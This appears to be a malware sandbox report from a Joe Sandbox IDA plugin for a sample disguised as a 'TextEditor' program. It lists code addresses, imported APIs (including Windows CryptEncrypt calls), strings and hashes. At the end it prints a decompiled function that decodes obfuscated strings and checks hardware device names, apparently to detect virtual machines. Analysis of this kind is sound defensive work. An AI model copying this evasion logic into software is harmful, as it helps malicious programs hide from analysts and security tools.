0x004063d9
0x004063dc
0x004063e0
0x004063ec
0x004063f0
0x00000000
0x004063f4
0x004063fb
0x0040640e
0x0040641d
0x0040641d
0x004063fd
0x00406406
0x00406406
0x00406428
0x0040642e
0x00406438
0x00406442
0x00406442
0x00406450
0x00406458
0x00406462
0x00406468
0x00406472
0x00406498
0x004064bb
0x004064c2
0x004064c5
0x004064cf
0x004064e1
0x004064e1
0x004064e6
0x004064ee
0x004064f2
0x0040647e
0x00406485
0x0040648e
0x00406490
0x00406490
0x0040648e
0x004064f6
0x00406509
0x00406517
0x0040652e
0x00406532
0x00406538
0x0040653a
0x00406548
0x0040654e
0x00406554
0x0040655a
0x0040656f
0x00406575
0x00406575
0x0040657b
0x00406581
0x00406585
0x00406585
0x00406593
0x0040659f
0x004065b3
0x004065b3
0x004065b7
0x004065bc
0x00000000
0x00000000
0x004065c2
0x004065cf
0x004065d7
0x004065e1
0x004065ec
0x004065ee
0x004065fc
0x004065fd
0x00406608
0x00406608
0x0040660e
0x00406620
0x00406648
0x0040665a
0x0040665c
0x0040665f
0x00406660
0x00406664
0x00406669
0x0040666f
0x0040666f
0x00406671
0x00406622
0x00406632
0x00406634
0x00406634
0x0040667b
0x004066bc
0x00000000
0x0040667d
0x0040668b
0x00406691
0x00406691
0x00406695
0x004066ed
0x004066f3
0x004066fb
0x00406704
0x0040670f
0x0040671e
0x00406729
0x00406735
0x00406746
0x0040674e
0x0040675f
0x00406764
0x0040676b
0x0040676d
0x00406772
0x00406772
0x00406778
0x00406778
0x0040678c
0x00406797
0x0040679d
0x004067a9
0x004067b2
0x004067c0
0x004067c1
0x004067c2
0x004067ce
0x004067d6
0x004067d7
0x004067d8
0x004067db
0x004067e9
0x004067ea
0x004067eb
0x004067ec
0x004067f3
0x004067fb
0x004067fc
0x00406800
0x0040680a
0x00406810
0x00406814
0x0040681b
0x0040681e
0x00406827
0x0040682d
0x00406831
0x00406835
0x0040683a
0x00406840
0x00406845
0x00406846
0x00406846
0x00406849
0x0040684b
0x0040684f
0x00406853
0x0040685a
0x0040685e
0x00406862
0x00406866
0x0040686e
0x00406876
0x0040687a
0x00406880
0x00406884
0x0040688a
0x0040688e
0x00406893
0x00406899
0x0040689e
0x004068a3
0x004068a5
0x00406f2b
0x00406f35
0x00406f4f
0x00406f55
0x00406f5d
0x00406f6b
0x00406f6c
0x00406f6d
0x00406f77
0x00406f78
0x00406f79
0x00406f83
0x00406f84
0x00406f85
0x00406f97
0x00406f9c
0x00406fa9
0x00406fab
0x00406fad
0x00406fb3
0x00406fb9
0x00406fb9
0x00406fbc
0x00406fc9
0x00406fcf
0x00406fe5
0x00406fe7
0x00406fe7
0x00406fe7
0x00406fea
0x00406ff3
0x00406ff6
0x00406ff7
0x00406ffa
0x00406ffb
0x00407000
0x00407005
0x00407011
0x0040701a
0x00407021
0x00407025
0x00407029
0x0040703a
0x0040703e
0x0040704a
0x0040704d
0x00407052
0x00407054
0x00407058
0x0040705c
0x00407066
0x0040706a
0x0040706e
0x00407073
0x00407079
0x0040707f
0x0040708c
0x0040708c
0x0040708e
0x00407094
0x00407096
0x004070a4
0x004070b5
0x004070bb
0x004070c1
0x004070c7
0x004070d0
0x004070d3
0x004070f7
0x00407106
0x0040710d
0x00407112
0x00407115
0x00407115
0x00407117
0x00407117
0x0040711e
0x00407125
0x00407126
0x00407126
0x00407135
0x0040713c
0x0040714b
0x00407150
0x00407153
0x00407155
0x00407155
0x00407157
0x00407157
0x0040715e
0x00407165
0x00407166
0x00407166
0x0040716a
0x00407170
0x00407172
0x004071a6
0x004071a8
0x004071a9
0x004071a9
0x004071b5
0x004071bd
0x004071bd
0x004071bf
0x004071c4
0x004071c6
0x004071c8
0x004071c8
0x004071cb
0x004071d0
0x004071d5
0x004071d5
0x004071e7
0x004071fd
0x00407203
0x00407208
0x0040720f
0x0040722b
0x00407231
0x00407238
0x00407240
0x00407240
0x00407238
0x00407246
0x00407250
0x00407250
0x00407251
0x00000000
0x00000000
0x00407253
0x00407253
0x0040725e
0x00407264
0x00407269
0x0040726f
0x0040727a
0x0040727f
0x00407285
0x00407271
0x00407271
0x00407271
0x00407292
0x0040729b
0x004072a6
0x004072b5
0x004072c0
0x004072d4
0x004072da
0x004072e1
0x004072e7
0x004072ec
0x004072fd
0x004072fd
0x004072ff
0x004072ff
0x0040731e
0x0040732f
0x00407331
0x0040733d
0x0040734e
0x00407353
0x00407358
0x0040735a
0x0040735a
0x00407361
0x00407361
0x00407376
0x0040737b
0x00407387
0x00407390
0x00407395
0x0040739b
0x004073a4
0x004073b0
0x004073b0
0x004073b2
0x004073b7
0x004073c2
0x004073c9
0x004073d4
0x004073db
0x004073e6
0x004073e8
0x004073f2
0x004073f8
0x004073fa
0x004073fc
0x0040740c
0x00407411
0x00407421
0x00407421
0x00407423
0x00407423
0x0040743b
0x00407446
0x0040744d
0x00407458
0x00407462
0x00407491
0x00407497
0x0040749d
0x0040749f
0x004074aa
0x004074ad
0x004074b0
0x004074cd
0x004074d3
0x004074e8
0x004074f0
0x004074f5
0x004074f8
0x004074fa
0x0040750f
0x0040750f
0x00407521
0x00407523
0x00407525
0x00407621
0x00407623
0x00407629
0x00407637
0x00407637
0x00000000
0x0040752b
0x0040752b
0x0040752d
0x00407541
0x00407541
0x00407578
0x00407578
0x0040757a
0x0040757c
0x004075e2
0x004075e9
0x004075ef
0x004075f1
0x004075f3
0x0040760b
0x0040760d
0x0040760d
0x0040760f
0x00407610
0x004075f5
0x004075fc
0x004075fe
0x00407600
0x00407601
0x00407601
0x0040761d
0x0040763d
0x00407644
0x0040764e
0x0040764f
0x00407650
0x0040765a
0x0040765b
0x0040765c
0x00407666
0x00407667
0x00407668
0x00407670
0x00407670
0x00407678
0x0040767a
0x0040767d
0x00407681
0x00407683
0x0040768b
0x00407693
0x00407697
0x00407697
0x004076a0
0x004076a5
0x004076a9
0x004076b2
0x004076c7
0x004076d2
0x004076d7
0x004076dc
0x004076f1
0x004076fa
0x00407700
0x00407708
0x0040770e
0x0040771a
0x0040771f
0x0040771f
0x0040771f
0x00407726
0x00407730
0x0040773c
0x00407740
0x00407746
0x00407756
0x00407757
0x0040775d
0x0040776e
0x0040777c
0x00407785
0x00407787
0x0040778b
0x0040778d
0x00407798
0x0040779a
0x004077e2
0x004077f9
0x004077ff
0x00407801
0x00407803
0x00407805
0x00407891
0x00407891
0x00407896
0x004078a4
0x004078aa
0x004078ab
0x004078c3
0x004078cb
0x004078d3
0x004078d8
0x004078e2
0x004078e3
0x004078e8
0x004078f5
0x004078f7
0x004078fe
0x00407903
0x00407907
0x0040790f
0x00407911
0x00407918
0x0040791a
0x0040791c
0x0040791e
0x00407922
0x00407926
0x0040792a
0x0040792c
0x00407c25
0x00407c25
0x00407c2a
0x00407c3b
0x00407c3f
0x00407c43
0x00407c48
0x00407c4f
0x00407c51
0x00407c56
0x00407c5d
0x00407c5d
0x00407c60
0x00407c68
0x00407c6c
0x00407c78
0x00407c7c
0x00407c81
0x00407c84
0x00407c85
0x00407c87
0x00407c8b
0x00407c8f
0x00407c97
0x00407c9b
0x00407c9f
0x00407cab
0x00407caf
0x00407cb3
0x00407cb7
0x00407cbb
0x00407cbf
0x00407cc4
0x00407ccd
0x00407cd6
0x00407cdb
0x00407ce0
0x00407ce6
0x00407cee
0x00407cfc
0x00407d01
0x00407d06
0x00407d19
0x00407d1a
0x00407d1b
0x00407d26
0x00407d34
0x00407d3a
0x00407d41
0x00407d47
0x00407d4e
0x00407d51
0x00407d51
0x00407d53
0x00407d54
0x00407d54
0x00407d69
0x00407d74
0x00407d77
0x00407d7d
0x00407d84
0x00407e7b
0x00407e85
0x00407e88
0x00407e90
0x00407e90
0x00407d8c
0x00407d8e
0x00407d96
0x00407da1
0x00407dac
0x00407db7
0x00407db7
0x00407db9
0x00407dba
0x00407dba
0x00407dcb
0x00407dcf
0x00407dd1
0x00407dd8
0x00407dd9
0x00407dda
0x00407dda
0x00407de9
0x00407dfd
0x00407e0c
0x00407e1a
0x00407e21
0x00407e2c
0x00407e3e
0x00407e40
0x00407e46
0x00407e4d
0x00407e4d
0x00407e51
0x00407e53
0x00407e68
0x00407e72
0x00407e79
0x00000000
0x00407e79
0x00407939
0x00407940
0x0040794b
0x00407951
0x00407952
0x00407952
0x00407954
0x00407958
0x00407967
0x00407973
0x00407975
0x0040797a
0x0040797f
0x00407980
0x00407987
0x00407989
0x0040798b
0x00407999
0x00407999
0x00407999
0x004079a7
0x004079ac
0x004079b4
0x004079b6
0x004079b6
0x004079b6
0x004079bb
0x004079cb
0x004079d1
0x004079d8
0x004079da
0x004079e5
0x004079ee
0x004079f7
0x004079fd
0x004079ff
0x00407a01
0x00407a08
0x00407a1b
0x00407a1b
0x00407a27
0x00407a2d
0x00407a33
0x00407a35
0x00407a37
0x00407a3d
0x00407a42
0x00407a46
0x00407a4b
0x00407a4b
0x00407a35
0x004079ff
0x00407a63
0x00407a6b
0x00407a6e
0x00407a71
0x00407a77
0x00407a80
0x00407a85
0x00407a88
0x00407a93
0x00407aa2
0x00407aaa
0x00407ab3
0x00407acb
0x00407acd
0x00407ad5
0x00407ad7
0x00407adf
0x00407adf
0x00407adf
0x00407af7
0x00407af9
0x00407b11
0x00407b15
0x00407b17
0x00407b19
0x00407b1d
0x00407b26
0x00407b2f
0x00407b35
0x00407b3e
0x00407b42
0x00407b46
0x00407b46
0x00407b49
0x00407b52
0x00407b56
0x00407b5e
0x00407b62
0x00407b68
0x00407b6c
0x00407b70
0x00407b70
0x00407b78
0x00407b7b
0x00407b7d
0x00407b7d
0x00407b7d
0x00407b84
0x00407b94
0x00407b96
0x00407b9d
0x00407ba0
0x00407ba7
0x00407bab
0x00407bb0
0x00407bb2
0x00407bb9
0x00407bb9
0x00407bb9
0x00407bbb
0x00407bbb
0x00407bbb
0x00407bbd
0x00407bc3
0x00407bc8
0x00407bef
0x00407bf5
0x00407bfc
0x00407bfe
0x00407c00
0x00407c02
0x00407c02
0x00407c02
0x00407c00
0x00407c0b
0x00407c0c
0x00407c10
0x00407c14
0x00407c15
0x00407c19
0x00407c19
0x00407c21
0x00000000
0x00000000
0x00000000
0x00000000
0x0040780b
0x0040780b
0x00407818
0x0040781e
0x00407821
0x00407826
0x0040782e
0x00407831
0x00407832
0x00407833
0x00407838
0x0040783d
0x00407844
0x0040784d
0x0040785a
0x0040785e
0x00407864
0x00407868
0x0040786c
0x00407870
0x00407875
0x0040787b
0x0040787f
0x00407884
0x00407886
0x00407887
0x00407889
0x00407889
0x00000000
0x0040780b
0x0040779c
0x004077a0
0x004077a0
0x004077a6
0x004077ad
0x004077ae
0x004077b1
0x004077ba
0x004077bc
0x004077be
0x004077be
0x004077be
0x004077c4
0x004077d0
0x004077d5
0x004077d9
0x004077da
0x004077da
0x004077de
0x00000000
0x004077de
0x00407580
0x00407581
0x00407588
0x00407589
0x00407590
0x00407599
0x004075ad
0x004075c2
0x004075ce
0x004075d5
0x004075d8
0x004075d8
0x00000000
0x004075dc
0x00407543
0x00407545
0x00000000
0x00000000
0x00407547
0x0040754c
0x0040754f
0x00407558
0x00407562
0x0040756f
0x00000000
0x00407575
0x0040752f
0x00407531
0x0040753a
0x0040753c
0x0040753c
0x0040753c
0x0040753f
0x00000000
0x0040753f
0x004074a1
0x004074a1
0x004074a1
0x004074a2
0x004074a5
0x004074a7
0x004074a7
0x004074a7
0x00000000
0x004074a2
0x0040749f
0x00407174
0x0040717b
0x00000000
0x00000000
0x0040717d
0x0040717f
0x0040717f
0x00407181
0x00407182
0x00407182
0x0040718d
0x0040718f
0x0040718f
0x00407190
0x00407190
0x00407193
0x00407194
0x00407194
0x0040719a
0x0040719d
0x004071a1
0x004071a1
0x004071a4
0x004071a4
0x00000000
0x004068ab
0x004068af
0x004068b6
0x004068ba
0x004068be
0x004068c6
0x004068ce
0x004068d2
0x004068d6
0x004068da
0x004068e4
0x004068e4
0x004068e9
0x004068f7
0x0040690c
0x00406917
0x0040692c
0x00406934
0x00406936
0x0040693e
0x00406943
0x00406948
0x0040694e
0x00406954
0x00406958
0x0040695f
0x00406960
0x00406969
0x0040696a
0x0040696e
0x00406971
0x00406976
0x0040697b
0x00406986
0x0040698d
0x00406993
0x00406997
0x0040699b
0x0040699e
0x004069a2
0x004069a5
0x004069ab
0x004069af
0x004069b3
0x004069b3
0x004069c1
0x004069c9
0x004069cf
0x004069d3
0x004069d5
0x00406a14
0x00406a19
0x00406a3f
0x00406a3f
0x00406a41
0x004069d7
0x004069d7
0x004069e9
0x004069ed
0x004069f2
0x004069f6
0x004069fa
0x004069fe
0x00406a02
0x00406a06
0x00406a0a
0x00406a0e
0x00406a0e
0x00406a45
0x00406a4a
0x00406a5f
0x00406a68
0x00406a76
0x00406a7c
0x00406a7d
0x00406a7e
0x00406a84
0x00406a86
0x00406a8c
0x00406a91
0x00406a92
0x00406a9e
0x00406aba
0x00406acc
0x00406ad2
0x00406ae0
0x00406aeb
0x00406aed
0x00406afc
0x00406afc
0x00406b02
0x00406b02
0x00406b08
0x00406b0d
0x00406b0f
0x00000000
0x00000000
0x00406b15
0x00406b1b
0x00000000
0x00000000
0x00406b1d
0x00406b23
0x00000000
0x00000000
0x00406b2f
0x00406b35
0x00406b3b
0x00406b41
0x00406b8c
0x00406b8c
0x00406b92
0x00406b95
0x00406b98
0x00406b9d
0x00406ba5
0x00406ba8
0x00406baa
0x00406bad
0x00406bb1
0x00406bb5
0x00406bb8
0x00406bbc
0x00406bbf
0x00406bc3
0x00406bc7
0x00406bcb
0x00406bcf
0x00406bd1
0x00406e67
0x00406e69
0x00406e69
0x00406e74
0x00406e79
0x00406e80
0x00406e83
0x00406e92
0x00406e99
0x00406ea0
0x00406ea7
0x00406eb2
0x00406ebd
0x00406ec8
0x00406ecf
0x00406ed6
0x00406edd
0x00406ee8
0x00406eee
0x00406eee
0x00406ef6
0x00406efa
0x00406f03
0x00406f09
0x00406f0d
0x00406f0e
0x00406f12
0x00406f14
0x004068e0
0x00000000
0x004068e0
0x00406f1a
0x00406f20
0x00406f25
0x00000000
0x00406f25
0x00406bd7
0x00406be1
0x00406be2
0x00406be4
0x00406bec
0x00406bf4
0x00406bf9
0x00406bfd
0x00406c00
0x00406c08
0x00406c0c
0x00406c10
0x00406c16
0x00406c16
0x00406c1b
0x00406c24
0x00406c2a
0x00406c3f
0x00406c47
0x00406c4c
0x00406c51
0x00406c56
0x00406c6b
0x00406c70
0x00406c76
0x00406c7f
0x00406c85
0x00406c8f
0x00406c93
0x00406c96
0x00406c9a
0x00406ca2
0x00406ca5
0x00406ca9
0x00406cad
0x00406cb0
0x00406cb4
0x00406cb8
0x00406cbd
0x00406cc2
0x00406cc6
0x00406ccb
0x00406cdc
0x00406ce1
0x00406ce6
0x00406cea
0x00406cef
0x00406d04
0x00406d09
0x00406d10
0x00406d16
0x00406d17
0x00406d1a
0x00406d1c
0x00406d22
0x00406d24
0x00406d26
0x00406d27
0x00406d28
0x00406d2b
0x00406d31
0x00406d41
0x00406d44
0x00406d45
0x00406d47
0x00406d50
0x00406d56
0x00406d61
0x00406d65
0x00406d69
0x00406d6d
0x00406d71
0x00406d75
0x00406d79
0x00406d79
0x00406d82
0x00406d87
0x00406d93
0x00406d95
0x00406d9b
0x00406da5
0x00406dae
0x00406db2
0x00406db7
0x00406dc6
0x00406dca
0x00406dce
0x00406dd2
0x00406ddb
0x00406ddf
0x00406de3
0x00406de7
0x00406dee
0x00406df2
0x00406dfa
0x00406dfe
0x00406e02
0x00406e06
0x00406e0a
0x00406e0e
0x00406e12
0x00406d9d
0x00406d9d
0x00406d9d
0x00406e41
0x00406e4b
0x00406e53
0x00406e58
0x00406e58
0x00000000
0x00406b47
0x00406b47
0x00406b4d
0x00406b50
0x00406b53
0x00406b58
0x00406b5d
0x00406b67
0x00406b6a
0x00406b6e
0x00406b70
0x00406b74
0x00406b77
0x00406b7b
0x00406b7e
0x00406b82
0x00406b84
0x00406b88
0x00000000
0x00406b88
0x004068e4
0x004068a5
0x00406697
0x0040669e
0x00000000
0x0040669e
0x004066c0
0x004066c6
0x004066dd
0x004066e5
0x004066e5
0x004066e7
0x00000000
0x004066e7
0x0040612a
0x00406131
0x00406138
0x0040613f
0x00406146
0x0040614c
0x0040618d
0x004061a1
0x004061a8
0x004061ad
0x004061ba
0x004061d4
0x004061da
0x004061dd
0x004061e3
0x004061f9
0x004061e5
0x004061f5
0x004061f5
0x004061fd
0x00406200
0x0040620f
0x0040620f
0x00406221
0x00406226
0x0040622e
0x0040623d
0x00406249
0x0040624e
0x00406254
0x00406256
0x00406256
0x0040626a
0x0040627f
0x0040628c
0x00406292
0x00406297
0x004062a6
0x004062ab
0x004062b0
0x00000000
0x004062b0
0x0040614e
0x00406154
0x00406182
0x00000000
0x00406156
0x00406162
0x00406170
0x00406175
0x00000000
0x00406175

APIs

__EH_prolog.LIBCMT ref: 00406100
MessageBoxA.USER32(00000000,Failed To read file,TextEditor,00000000), ref: 00406162
_memset.LIBCMT ref: 004061A8
CreateAcceleratorTableA.USER32(00000000,00000000), ref: 004061B4
wsprintfA.USER32 ref: 004061D4
MessageBoxA.USER32(00000000,?,0046ACD0,00000023), ref: 004061F5
SendMessageA.USER32(00000000,00000111,00000000), ref: 0040620F
TranslateAcceleratorA.USER32(00000000,00000000,?,?), ref: 00406279
TranslateMessage.USER32(?), ref: 0040628C
_memset.LIBCMT ref: 00406308
SetAbortProc.GDI32(00000000,00408568), ref: 00406367
GetCursorPos.USER32(?), ref: 00406375
CreateEventA.KERNEL32(00000000,00000000,00000000,Menulapkievent,?,00000000,00404741,?,?,?,?,00000000), ref: 00406385
SetMapMode.GDI32(00000007), ref: 0040639F
SetWindowExtEx.GDI32(00000000,00000000,?,00000000), ref: 004063B7
GetCursorPos.USER32(?), ref: 00406428
SendInput.USER32(00000001,?,0000001C), ref: 00406450
GetPriorityClass.KERNEL32(00000000), ref: 00406458
GlobalAlloc.KERNEL32(00000040,00000200), ref: 00406548
DialogBoxIndirectParamA.USER32(?,00000000,00000000,00408568,?), ref: 0040656F
WaitForSingleObject.KERNEL32(?,?), ref: 0040668B
SendMessageA.USER32(00000405,00000000,00000000), ref: 004066BC
GetSystemMetrics.USER32(?), ref: 00406797
_memset.LIBCMT ref: 00406800
__libm_sse2_asin_precise.LIBCMT ref: 00406835
__floor_pentium4.LIBCMT ref: 00406976
GetTextFaceA.GDI32(00000000,00000000), ref: 004069C1
__libm_sse2_asin_precise.LIBCMT ref: 004069ED
GetViewportExtEx.GDI32(00000000,?), ref: 00406A76
#413.COMCTL32(00000000,00000000), ref: 00406A8C
PdhCollectQueryData.PDH(00000000,00000000,00000000), ref: 00406A92
SetWindowTextA.USER32(00000000,00000000), ref: 00406A9E
GetViewportOrgEx.GDI32(00000000,00000000), ref: 00406AA6
LoadImageA.USER32(?,?,00000001,00000000), ref: 00406ACC
RedrawWindow.USER32(00000000,00000000,00000000,00000101), ref: 00406B2F
__libm_sse2_log10_precise.LIBCMT ref: 00406B53
__libm_sse2_log10_precise.LIBCMT ref: 00406B98
__libm_sse2_log10_precise.LIBCMT ref: 00406BF4
__floor_pentium4.LIBCMT ref: 00406D2B
__libm_sse2_asin_precise.LIBCMT ref: 00406DB2
CreateDialogParamA.USER32(?,PrintDlgBox,00000000,00000000,?), ref: 00406E2C
SetDlgItemTextA.USER32(00000000,?), ref: 00406E41
_memset.LIBCMT ref: 00406E74
GetOpenFileNameA.COMDLG32 ref: 00406EE8
_memset.LIBCMT ref: 00406F5D
GetClassNameA.USER32(00000000,0046B7A0,00000020), ref: 00406FAD
GetClassNameA.USER32(0046B7C4,00000020), ref: 00406FC9
__floor_pentium4.LIBCMT ref: 00407000
DescribePixelFormat.GDI32(00000000,00000005,00000028,?), ref: 004070B5
_memset.LIBCMT ref: 0040710D
_memset.LIBCMT ref: 0040713C
_strrchr.LIBCMT ref: 0040714B
SetScrollInfo.USER32(00000000,00000001,?,00000001), ref: 004071E7
GetScrollInfo.USER32(00000001,00000000), ref: 004071FD
ScrollWindow.USER32(00000000,?,00000000,00000000), ref: 0040722B
UpdateWindow.USER32 ref: 00407240
GetDialogBaseUnits.USER32 ref: 0040725E
VirtualAlloc.KERNEL32(00000000,?,00003000,?), ref: 004072D4
ChooseColorA.COMDLG32(00000024,?,?,?,?,?,?), ref: 004073F2
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00407411
SendMessageA.USER32(00000000,00002001,00000000), ref: 00407421
SendMessageA.USER32(?,00001306,00000000,00000024), ref: 0040744D
GetClientRect.USER32(?,?), ref: 00407458
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00407491
ShowWindow.USER32(?,00000000), ref: 004074A5
ShowWindow.USER32(?,00000005), ref: 004074AD
SetFocus.USER32(?), ref: 004074B0
SendDlgItemMessageA.USER32(?,00000401,00000001), ref: 004074CD
_memset.LIBCMT ref: 004074F0
MessageBoxA.USER32(?,Do you want to save it ?,0046ACD0,00000021), ref: 0040750F
SendMessageA.USER32(?,00001308,00000000,00000000), ref: 00407521
ShowWindow.USER32(?,00000000), ref: 0040753A
SendMessageA.USER32(?,0000000C,00000000,0044D651), ref: 00407558
SendMessageA.USER32(?,0000000D,00007FFF,?), ref: 00407599
SendMessageA.USER32(?,0000000C,00000000,?), ref: 004075AD

Part of subcall function 004346BB: _strlen.LIBCMT ref: 004346CD
Part of subcall function 004346BB: _malloc.LIBCMT ref: 004346D6

DestroyWindow.USER32(?), ref: 004075E9
ShowWindow.USER32(?,00000005), ref: 004075FC
ShowWindow.USER32(?,00000005), ref: 0040760B
SendMessageA.USER32(?,00001330,-00000001,00000000), ref: 0040761D
MessageBoxA.USER32(00000000,Can not Close the file,0046ACD0,00000000), ref: 00407637
SetStretchBltMode.GDI32(00000000,00000004), ref: 00407708
SetAbortProc.GDI32(00000008,00408568), ref: 00407740
DrawFrameControl.USER32(?,00000004,00004210), ref: 0040776E
LoadImageA.USER32(?,00000000,00000000,00000000,00000000,00000000), ref: 004077F9
SetWindowLongA.USER32(000000EC,00000080), ref: 00407818
__floor_pentium4.LIBCMT ref: 00407838
__time64.LIBCMT ref: 00407975

Part of subcall function 00434B6E: GetSystemTimeAsFileTime.KERNEL32(?,-0000007C,-0000007C,00000000,0040797A,?,?,?), ref: 00434B77
Part of subcall function 00434B6E: __aulldiv.LIBCMT ref: 00434B97

__time64.LIBCMT ref: 004079A7
GetFileInformationByHandle.KERNEL32(?,?,?,?), ref: 004079CB
QueryPerformanceCounter.KERNEL32(?), ref: 004079F7
QueryPerformanceCounter.KERNEL32(?), ref: 00407A27
_fprintf.LIBCMT ref: 00407A46
__libm_sse2_asin_precise.LIBCMT ref: 00407B35
_memset.LIBCMT ref: 00407CFC
CreateFontIndirectA.GDI32(?), ref: 00407D28
SelectObject.GDI32(00000000,00000000), ref: 00407D38
SetTextColor.GDI32(00000000,00000000), ref: 00407D41
TextOutA.GDI32(00000000,00000000,?,?,?), ref: 00407D69
SelectObject.GDI32(00000000,?), ref: 00407D74
DeleteObject.GDI32(00000000), ref: 00407D77
CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 00407DFD
CryptImportKey.ADVAPI32(?,?,00000014,00000000,00000000,?), ref: 00407E1A
CryptSetKeyParam.ADVAPI32(?,00000004,00000002,00000000), ref: 00407E2C
CryptDestroyKey.ADVAPI32(?), ref: 00407E46
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E4D
CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,0046AB98,?,00000008), ref: 00407E68
CryptDestroyKey.ADVAPI32(?), ref: 00407E72
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E79

Strings

Timer, xrefs: 00407A0F
PrintDlgBox, xrefs: 00406E20
Do you want to save it ?, xrefs: 00407503
$, xrefs: 004073B7
Start Value %i, xrefs: 00407A3D
Failed To read file, xrefs: 0040615C
TextEditor, xrefs: 00406157
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00407DF0
0, xrefs: 004078CB
Can not Close the file, xrefs: 00407631
Save current changes in %s?, xrefs: 004061CE
Menulapkievent, xrefs: 0040637B
z, xrefs: 004078C3
Helvetica, xrefs: 00407D0D
6, xrefs: 0040768B

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Message$Window$Send$_memset$Crypt$ShowText$CreateObject__floor_pentium4__libm_sse2_asin_precise$ClassContextDestroyDialogFileNameParamQueryScroll__libm_sse2_log10_precise$AbortAcceleratorAllocColorCounterCursorImageIndirectInfoItemLoadModePerformanceProcReleaseSelectSystemTimeTranslateViewport__time64$#413AcquireBaseChooseClientCollectControlDataDeleteDescribeDrawEncryptEventFaceFocusFontFormatFrameGlobalH_prologHandleImportInformationInputLongMetricsMoveOpenPixelPriorityRectRedrawSingleStretchTableUnitsUpdateVirtualWait__aulldiv_fprintf_malloc_strlen_strrchrwsprintf
String ID: $$0$6$Can not Close the file$Do you want to save it ?$Failed To read file$Helvetica$Menulapkievent$Microsoft Enhanced Cryptographic Provider v1.0$PrintDlgBox$Save current changes in %s?$Start Value %i$TextEditor$Timer$z
API String ID: 3888150562-910805347
Opcode ID: 30beeb54b11c61b554b5da08497684d10d72c8e06b052cba5a8f73aee62fd962
Instruction ID: 4caa4a4ac4c054274e37fc0eaf633fbfcf3c11271ccf40503fa7b3e6efd597de
Opcode Fuzzy Hash: 30beeb54b11c61b554b5da08497684d10d72c8e06b052cba5a8f73aee62fd962
Instruction Fuzzy Hash: A803CF715087409FD321DF74D881A6AB7E5FB89744F004A3EF685A32A1EBB4A854CF4B

Uniqueness

Uniqueness Score: -1,00%

Function 00401453, Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00401453() {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v40;
				char _v44;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v84;
				char _v100;
				intOrPtr _t84;
				char* _t85;
				char* _t91;
				intOrPtr _t96;
				char* _t108;
				intOrPtr* _t110;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v8 = 0;
				_v40 = 0;
				asm("movsd");
				_v36 = 0x2c;
				_v35 = 0x14;
				_v34 = 0x28;
				_v33 = 0x14;
				_v32 = 0xa0;
				_v31 = 0xbc;
				_v30 = 0xb7;
				_v29 = 0xf9;
				_v28 = 0xa9;
				_v27 = 0x9c;
				_v26 = 0xad;
				_v25 = 0x9c;
				_v24 = 0x22;
				_v23 = 0x33;
				_v22 = 0x30;
				_v21 = 0x7c;
				_v56 = 0xa4;
				_v55 = 0x97;
				_v54 = 0xa2;
				_v53 = 0x97;
				_v52 = 0x28;
				_v51 = 0x30;
				_v50 = 0x27;
				_v49 = 0x63;
				_v48 = 6;
				_v47 = 0xa5;
				_v72 = 0xc9;
				_v71 = 0xff;
				_v70 = 0xc3;
				_v69 = 0xff;
				_v68 = 0x45;
				_v67 = 0x5c;
				_v66 = 0x4f;
				_v65 = 0x1e;
				_v64 = 0x6c;
				_v63 = 0xc9;
				_v62 = 0x45;
				_v61 = 0xd1;
				_v60 = 0xa1;
				_v59 = 0xec;
				_v16 = E00402F3D( &_v36);
				_v20 = E00402F3D( &_v28);
				_v24 = E00402F3D( &_v56);
				_t84 = E00402F3D( &_v72);
				_v32 = _t84;
				_t85 =  &_v100;
				__imp__SetupDiGetClassDevsA(_t85, 0, 0, 2); // executed
				_t108 = _t85;
				if(_t108 != 0xffffffff) {
					_t91 =  &_v84;
					_v84 = 0x1c;
					__imp__SetupDiEnumDeviceInfo(_t108, 0, _t91);
					if(_t91 != 0) {
						_t110 = __imp__SetupDiGetDeviceRegistryPropertyA; // 0x770a7c71
						 *_t110(_t108,  &_v84, 0xc,  &_v44, 0, 0,  &_v8);
						if(_v8 != 0) {
							_t96 = E00401671(_v8);
							_v12 = _t96;
							if(_t96 != 0) {
								_push( &_v8);
								_push(_v8);
								_push(_t96);
								_push( &_v44);
								_push(0xc);
								_push( &_v84);
								_push(_t108);
								if( *_t110() != 0) {
									_t111 = _v12;
									if(E00401EAD(_v12, _v16) != 0 || E00401EAD(_t111, _v20) != 0) {
										L9:
										_v40 = 1;
									} else {
										_t68 =  &_v24; // 0x22
										if(E00401EAD(_t111,  *_t68) != 0 || E00401EAD(_t111, _v32) != 0) {
											goto L9;
										}
									}
								}
								E00401686(_v12);
							}
						}
					}
					__imp__SetupDiDestroyDeviceInfoList(_t108); // executed
				}
				E00401686(_v16);
				E00401686(_v20);
				_t74 =  &_v24; // 0x22
				E00401686( *_t74);
				E00401686(_v32);
				return _v40;
			}

0x00401464
0x00401465
0x00401466
0x0040146c
0x0040146f
